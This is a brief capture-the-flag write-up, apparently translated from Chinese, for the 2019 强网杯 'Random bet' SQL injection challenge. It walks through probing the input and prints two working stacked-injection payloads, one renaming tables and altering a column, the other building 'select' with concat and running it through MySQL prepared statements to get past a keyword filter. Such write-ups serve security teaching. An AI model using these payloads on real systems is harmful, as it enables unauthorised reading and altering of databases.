[强网杯2019] Random bet

[强网杯2019] Random bet

Test site

Stack injection, prepared statements

Ideas

Test 1' or 1=1 #, it is preliminary judged that there is SQL injection
Insert picture description here
The number of test fields, an error will be reported at 3, and no error will be reported at 2, indicating that the number of fields is 2
Insert picture description here
Test union injection and found that the filtered keywords are echoed
Insert picture description here
Use the stack to inject the database name
Insert picture description here
Use stacking to inject the name of the table
Insert picture description here
Use the stack to inject 1919810931114514the contents of the exploded table , here you need to pay attention, when the table name is a number, you need to wrap it in backquotes to query
Insert picture description here

Payload

method one:
  • Rename the words table to other table names through rename
  • Change the name of the 1919810931114514 table to words
  • Add a new column name id to the new words table
  • Rename the flag to data
1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#
Method 2:
Use MySQL prepared statements to bypass filtering
1';set @a=concat("sel","ect flag from `1919810931114514`");prepare sql from @a;execute sql;# 
1';sEt @a=concat("sel","ect flag from `1919810931114514`");Prepare hello from @a;execute hello;#